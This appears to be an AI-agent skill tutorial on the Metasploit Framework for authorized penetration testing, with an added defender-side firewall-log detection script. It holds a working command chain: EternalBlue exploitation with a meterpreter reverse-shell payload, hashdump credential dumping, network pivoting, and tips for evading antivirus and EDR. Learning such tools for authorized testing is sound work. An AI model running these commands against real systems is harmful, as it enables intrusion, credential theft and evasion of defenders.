
Comprehensive Metasploit Framework

Production-ready skill covering the Metasploit Framework for authorized penetration testing. Includes structured workflows, validation checks, and reusable patterns for security.

Skill · Cliptics · security · v1.0.0 · MIT


Leverage the Metasploit Framework for comprehensive penetration testing, from initial exploitation through post-exploitation and pivoting. This skill covers module selection, payload generation, session management, auxiliary scanning, post-exploitation data collection, and custom exploit development for authorized security assessments.

When to Use This Skill

Choose Comprehensive Metasploit Framework when you need to:

  • Exploit known vulnerabilities with reliable, tested exploits
  • Generate payloads for authorized penetration testing
  • Manage multiple compromised sessions and pivot through networks
  • Run auxiliary scans (port scanning, service enumeration, credential testing)

Consider alternatives when:

  • You need web application-specific testing (use Burp Suite)
  • You need custom exploit development from scratch (use pwntools)
  • You need automated vulnerability scanning without exploitation (use Nessus or OpenVAS)

Quick Start

# Start Metasploit console
msfconsole

# Basic workflow: search, configure, exploit
msf6> search type:exploit name:eternalblue
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS 192.168.1.100
msf6> set LHOST 192.168.1.50
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> check
msf6> exploit

# Alternative: use msfconsole with resource scripts
# msfconsole -r automation_script.rc
# Python interface to Metasploit via REST API
import requests


class MetasploitRPC:
    """Interface with Metasploit's RPC API over HTTP/JSON.

    Assumes an HTTP endpoint under /api/v1 that returns a bearer token on
    login; adjust the base URL and paths to the Metasploit web service you
    run, and use HTTPS for anything other than a loopback connection.
    """

    def __init__(self, host='127.0.0.1', port=55553, password='msf', timeout=10):
        self.url = f"http://{host}:{port}/api/v1"
        self.timeout = timeout
        self.token = self._authenticate(password)

    def _authenticate(self, password):
        # Exchange the password for a session token; fail loudly on HTTP errors
        resp = requests.post(f"{self.url}/auth/login",
                             json={"username": "msf", "password": password},
                             timeout=self.timeout)
        resp.raise_for_status()
        token = resp.json().get('token')
        if not token:
            raise RuntimeError("login succeeded but no token was returned")
        return token

    def _call(self, endpoint, data=None):
        # POST when a request body is supplied, GET otherwise; both carry the token
        headers = {"Authorization": f"Bearer {self.token}"}
        if data is not None:
            resp = requests.post(f"{self.url}/{endpoint}", json=data,
                                 headers=headers, timeout=self.timeout)
        else:
            resp = requests.get(f"{self.url}/{endpoint}",
                                headers=headers, timeout=self.timeout)
        resp.raise_for_status()
        return resp.json()

    def list_sessions(self):
        return self._call("sessions")

    def list_jobs(self):
        return self._call("jobs")


# msf = MetasploitRPC(password='your_password')
# print(msf.list_sessions())

Core Concepts

Module Types

Type      | Purpose                               | Example
----------|---------------------------------------|------------------------------------------
Exploits  | Deliver payloads via vulnerabilities  | exploit/windows/smb/ms17_010_eternalblue
Payloads  | Code executed after exploitation      | windows/meterpreter/reverse_tcp
Auxiliary | Scanning, fuzzing, DoS (non-exploit)  | auxiliary/scanner/portscan/tcp
Post      | Post-exploitation modules             | post/windows/gather/hashdump
Encoders  | Obfuscate payloads                    | encoder/x86/shikata_ga_nai
Nops      | No-operation padding                  | nop/x86/single_byte
Evasion   | AV evasion techniques                 | evasion/windows/windows_defender_exe

Common Metasploit Workflow

# 1. Reconnaissance with auxiliary modules
msf6> use auxiliary/scanner/portscan/tcp
msf6> set RHOSTS 192.168.1.0/24
msf6> set THREADS 20
msf6> run

# 2. Service enumeration
msf6> use auxiliary/scanner/smb/smb_version
msf6> set RHOSTS 192.168.1.0/24
msf6> run

# 3. Vulnerability scanning
msf6> use auxiliary/scanner/smb/smb_ms17_010
msf6> set RHOSTS 192.168.1.100
msf6> run

# 4. Exploitation
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS 192.168.1.100
msf6> set LHOST 192.168.1.50
msf6> exploit

# 5. Post-exploitation (from meterpreter session)
meterpreter> sysinfo
meterpreter> getuid
meterpreter> hashdump
meterpreter> run post/multi/recon/local_exploit_suggester

# 6. Pivoting through compromised host
meterpreter> run autoroute -s 10.0.0.0/24
meterpreter> background
msf6> use auxiliary/server/socks_proxy
msf6> set SRVPORT 1080
msf6> run -j
# Now use proxychains to access 10.0.0.0/24 through the pivot

Configuration

Parameter | Description                        | Default
----------|------------------------------------|----------------
RHOSTS    | Target host(s) or network          | Required
RPORT     | Target port                        | Module-specific
LHOST     | Local host for reverse connections | Auto-detected
LPORT     | Local port for reverse listener    | 4444
PAYLOAD   | Payload to deliver                 | Module default
THREADS   | Concurrent threads for scanning    | 1
WORKSPACE | Metasploit workspace name          | "default"
VERBOSE   | Verbose output                     | false

Best Practices

  1. Use workspaces to organize engagements — Create a workspace for each client or engagement: workspace -a client_name. This keeps hosts, services, credentials, and loot separated between projects and prevents data leakage between assessments.

  2. Always run check before exploit — The check command verifies whether the target is vulnerable without sending the exploit payload. This avoids crashing services unnecessarily and confirms the vulnerability before exploitation. Not all modules support check, but use it when available.

  3. Prefer staged payloads for reliability — Staged payloads (windows/meterpreter/reverse_tcp) send a small stager first, then download the full payload. They're more reliable across network conditions than stageless payloads (windows/meterpreter_reverse_tcp), which send everything in one shot.

  4. Use the database to track findings — Metasploit's database stores hosts, services, vulnerabilities, and credentials found during the engagement. Use hosts, services, vulns, and creds commands to review collected data. Export with db_export for reporting.

  5. Clean up after testing — Remove any payloads, backdoors, or persistence mechanisms installed during testing. Use sessions -K to kill all sessions and document any artifacts that may remain on target systems. Provide cleanup details in the final report.

Common Issues

Exploit fails with "Exploit completed, but no session was created" — The exploit executed but the payload couldn't connect back. Common causes: firewall blocking the reverse connection, wrong LHOST (use your VPN/tunnel IP), antivirus killing the payload, or wrong payload architecture (x86 vs x64).
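The reverse connection that the note above troubleshoots (a handler the payload cannot reach because egress is filtered) is exactly what a perimeter firewall log records from the defender's side. The script below is an added, defender-side example, not part of the original skill and not Metasploit code: it parses constructed firewall log lines in a made-up format and flags outbound attempts to the default ports this page documents (LPORT 4444 for the reverse listener, SRVPORT 1080 for socks_proxy) as well as repeated denied attempts to a single destination, which is what a stager retrying its handler looks like at the network edge. The log format, the port set and the sample lines are assumptions for illustration.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Defaults documented on this page: LPORT 4444 (reverse listener) and
# SRVPORT 1080 (socks_proxy). Extend from your own environment's baseline.
DEFAULT_LISTENER_PORTS = {4444, 1080}

# Constructed (assumed) firewall log format for this example:
#   <timestamp> <ALLOW|DENY> <TCP|UDP> <src>:<sport> -> <dst>:<dport>
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<action>ALLOW|DENY)\s+(?P<proto>TCP|UDP)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Constructed sample lines (not real traffic); documentation address ranges only.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z ALLOW TCP 10.0.0.12:51000 -> 93.184.216.34:443
2024-05-01T10:00:02Z DENY TCP 10.0.0.12:51001 -> 203.0.113.5:4444
2024-05-01T10:00:07Z DENY TCP 10.0.0.12:51002 -> 203.0.113.5:4444
2024-05-01T10:00:12Z DENY TCP 10.0.0.12:51003 -> 203.0.113.5:4444
2024-05-01T10:00:15Z ALLOW TCP 10.0.0.20:51010 -> 93.184.216.34:80
2024-05-01T10:00:20Z DENY TCP 10.0.0.20:51011 -> 203.0.113.9:8080
2024-05-01T10:00:25Z DENY TCP 10.0.0.20:51012 -> 203.0.113.9:8080
2024-05-01T10:00:30Z DENY TCP 10.0.0.20:51013 -> 203.0.113.9:8080
2024-05-01T10:00:35Z DENY TCP 10.0.0.20:51014 -> 203.0.113.9:8080
garbage line that does not parse
"""


@dataclass(frozen=True)
class Finding:
    src: str
    dst: str
    dport: int
    reason: str


def parse_line(line):
    """Return the matched fields as a dict, or None for lines that do not fit the format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def analyze(log_text, retry_threshold=3):
    """Flag outbound attempts to default listener ports and repeated denied connect-backs.

    Both checks aggregate per (src, dst, dport) so each suspicious flow is
    reported once rather than once per log line.
    """
    attempts = Counter()  # (src, dst, dport) -> all entries
    denied = Counter()    # (src, dst, dport) -> DENY entries only
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable lines are skipped, not fatal
        key = (rec["src"], rec["dst"], int(rec["dport"]))
        attempts[key] += 1
        if rec["action"] == "DENY":
            denied[key] += 1

    findings = []
    for (src, dst, dport), n in sorted(attempts.items()):
        if dport in DEFAULT_LISTENER_PORTS:
            findings.append(Finding(src, dst, dport,
                                    f"{n} outbound attempts to default Metasploit port {dport}"))
    # A stager that cannot reach its handler keeps retrying; repeated DENY
    # entries to one destination are the egress-side trace of that behaviour.
    for (src, dst, dport), n in sorted(denied.items()):
        if n >= retry_threshold:
            findings.append(Finding(src, dst, dport,
                                    f"{n} denied outbound attempts to the same destination"))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f.src} -> {f.dst}:{f.dport}: {f.reason}")
```

The port check catches only defaults, so treat it as a low-cost first filter; the retry check is port-agnostic and is the one worth tuning (threshold and time window) against your own egress baseline. Allowed connections to the default ports are reported too, since an ALLOW to 4444 is the case worth investigating first.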

Meterpreter session dies immediately after connection — Antivirus or EDR is detecting and killing the payload. Try a different payload type (use meterpreter/reverse_https which is harder to detect), encode the payload, or use evasion modules. For modern environments, custom payloads may be necessary.

Database connection fails on startup — Metasploit requires PostgreSQL. Start the database service: sudo msfdb init then sudo msfdb start. If the database is corrupted, reinitialize with sudo msfdb reinit. Check connection with db_status in msfconsole.
